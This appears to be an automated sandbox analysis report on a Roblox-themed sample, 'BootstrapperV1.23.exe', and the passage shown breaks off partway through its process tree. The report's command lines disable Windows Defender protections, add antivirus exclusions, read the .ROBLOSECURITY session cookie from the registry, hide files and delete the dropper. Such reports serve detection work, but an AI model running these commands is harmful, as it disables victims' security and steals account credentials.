Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeSystemEnvironmentPrivilege	3436	powershell.exe
Token: SeRemoteShutdownPrivilege	3436	powershell.exe
Token: SeUndockPrivilege	3436	powershell.exe
Token: SeManageVolumePrivilege	3436	powershell.exe
Token: 33	3436	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Windows Security Host.exeWindows Security Host.exe

pid process

3780 Windows Security Host.exe
3692 Windows Security Host.exe

pid	process
3780	Windows Security Host.exe
3692	Windows Security Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BootstrapperV1.23.exeInjector.exeBootstrapperV1.23.exeWindows Security Host.exeBootstrapperV1.23.exeBootstrapperV1.23.execmd.exeBootstrapperV1.23.exe

description	pid	process	target process
PID 1240 wrote to memory of 5080	1240	BootstrapperV1.23.exe	Injector.exe
PID 1240 wrote to memory of 5080	1240	BootstrapperV1.23.exe	Injector.exe
PID 1240 wrote to memory of 3780	1240	BootstrapperV1.23.exe	Windows Security Host.exe
PID 1240 wrote to memory of 3780	1240	BootstrapperV1.23.exe	Windows Security Host.exe
PID 1240 wrote to memory of 1424	1240	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 1240 wrote to memory of 1424	1240	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 5080 wrote to memory of 2916	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 2916	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 1748	5080	Injector.exe	attrib.exe
PID 5080 wrote to memory of 1748	5080	Injector.exe	attrib.exe
PID 1424 wrote to memory of 1684	1424	BootstrapperV1.23.exe	Injector.exe
PID 1424 wrote to memory of 1684	1424	BootstrapperV1.23.exe	Injector.exe
PID 1424 wrote to memory of 3004	1424	BootstrapperV1.23.exe	Windows Security Host.exe
PID 1424 wrote to memory of 3004	1424	BootstrapperV1.23.exe	Windows Security Host.exe
PID 1424 wrote to memory of 5052	1424	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 1424 wrote to memory of 5052	1424	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 5080 wrote to memory of 3436	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 3436	5080	Injector.exe	powershell.exe
PID 3780 wrote to memory of 556	3780	Windows Security Host.exe	powershell.exe
PID 3780 wrote to memory of 556	3780	Windows Security Host.exe	powershell.exe
PID 5080 wrote to memory of 3332	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 3332	5080	Injector.exe	powershell.exe
PID 3780 wrote to memory of 3604	3780	Windows Security Host.exe	powershell.exe
PID 3780 wrote to memory of 3604	3780	Windows Security Host.exe	powershell.exe
PID 5080 wrote to memory of 416	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 416	5080	Injector.exe	powershell.exe
PID 3780 wrote to memory of 4320	3780	Windows Security Host.exe	powershell.exe
PID 3780 wrote to memory of 4320	3780	Windows Security Host.exe	powershell.exe
PID 5080 wrote to memory of 3944	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 3944	5080	Injector.exe	powershell.exe
PID 5052 wrote to memory of 2708	5052	BootstrapperV1.23.exe	Injector.exe
PID 5052 wrote to memory of 2708	5052	BootstrapperV1.23.exe	Injector.exe
PID 5052 wrote to memory of 1460	5052	BootstrapperV1.23.exe	powershell.exe
PID 5052 wrote to memory of 1460	5052	BootstrapperV1.23.exe	powershell.exe
PID 5052 wrote to memory of 2444	5052	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 5052 wrote to memory of 2444	5052	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 3780 wrote to memory of 688	3780	Windows Security Host.exe	powershell.exe
PID 3780 wrote to memory of 688	3780	Windows Security Host.exe	powershell.exe
PID 5080 wrote to memory of 4636	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 4636	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 396	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 396	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 1492	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 1492	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 2788	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 2788	5080	Injector.exe	powershell.exe
PID 5080 wrote to memory of 4904	5080	Injector.exe	wmic.exe
PID 5080 wrote to memory of 4904	5080	Injector.exe	wmic.exe
PID 2444 wrote to memory of 3052	2444	BootstrapperV1.23.exe	Injector.exe
PID 2444 wrote to memory of 3052	2444	BootstrapperV1.23.exe	Injector.exe
PID 2444 wrote to memory of 1028	2444	BootstrapperV1.23.exe	wmic.exe
PID 2444 wrote to memory of 1028	2444	BootstrapperV1.23.exe	wmic.exe
PID 2444 wrote to memory of 2244	2444	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 2444 wrote to memory of 2244	2444	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 5080 wrote to memory of 4928	5080	Injector.exe	cmd.exe
PID 5080 wrote to memory of 4928	5080	Injector.exe	cmd.exe
PID 4928 wrote to memory of 2908	4928	cmd.exe	wmic.exe
PID 4928 wrote to memory of 2908	4928	cmd.exe	wmic.exe
PID 2244 wrote to memory of 2300	2244	BootstrapperV1.23.exe	Injector.exe
PID 2244 wrote to memory of 2300	2244	BootstrapperV1.23.exe	Injector.exe
PID 2244 wrote to memory of 2984	2244	BootstrapperV1.23.exe	Windows Security Host.exe
PID 2244 wrote to memory of 2984	2244	BootstrapperV1.23.exe	Windows Security Host.exe
PID 2244 wrote to memory of 4540	2244	BootstrapperV1.23.exe	BootstrapperV1.23.exe
PID 2244 wrote to memory of 4540	2244	BootstrapperV1.23.exe	BootstrapperV1.23.exe

Views/modifies file attributes 1 TTPs 16 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
4136	attrib.exe
3084	attrib.exe
4608	attrib.exe
1560	attrib.exe
868	attrib.exe
2804	attrib.exe
844	attrib.exe
1472	attrib.exe
3536	attrib.exe
188	attrib.exe
1036	attrib.exe
696	attrib.exe
1748	attrib.exe
2840	attrib.exe
2596	attrib.exe
320	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Users\Admin\AppData\Local\Temp\Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:1748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3944
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4636
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:396
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2788
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious behavior: EnumeratesProcesses
    PID:4904
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2908
- C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp35CC.tmp.bat""
    3⤵
    PID:2036
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1996
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Users\Admin\AppData\Local\Temp\Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Executes dropped EXE
    PID:1684
- - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3004
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
      4⤵
      Executes dropped EXE
      PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
      4⤵
      Executes dropped EXE
      PID:1460
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2444
    - - C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        5⤵
        Executes dropped EXE
        
        PID:3052
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        5⤵
        Executes dropped EXE
        
        PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2244
      - C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2780
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2908
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3584
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2804
      - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:2984
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        6⤵
        Checks computer location settings
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        7⤵
        Executes dropped EXE
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        7⤵
        Executes dropped EXE
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        7⤵
        Checks computer location settings
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        8⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        8⤵
        Executes dropped EXE
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        8⤵
        Checks computer location settings
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        9⤵
        Executes dropped EXE
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        9⤵
        Executes dropped EXE
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        9⤵
        Checks computer location settings
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        10⤵
        Executes dropped EXE
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        10⤵
        Executes dropped EXE
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        10⤵
        Checks computer location settings
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        11⤵
        Executes dropped EXE
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        11⤵
        Executes dropped EXE
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        11⤵
        Checks computer location settings
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        12⤵
        Executes dropped EXE
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        12⤵
        Executes dropped EXE
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        12⤵
        Checks computer location settings
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        13⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:3344
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        14⤵
        Views/modifies file attributes
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        
        PID:5004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        
        PID:2596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:2800
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:4052
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4432
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:324
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        13⤵
        Executes dropped EXE
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        13⤵
        Checks computer location settings
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        14⤵
        Executes dropped EXE
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        14⤵
        Executes dropped EXE
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        14⤵
        Checks computer location settings
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        15⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        15⤵
        Executes dropped EXE
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        15⤵
        Checks computer location settings
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        16⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        16⤵
        Executes dropped EXE
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        16⤵
        Checks computer location settings
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:3984
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        18⤵
        Views/modifies file attributes
        
        PID:868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:1460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:3460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:4456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:3548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:4468
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3144
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        17⤵
        Executes dropped EXE
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
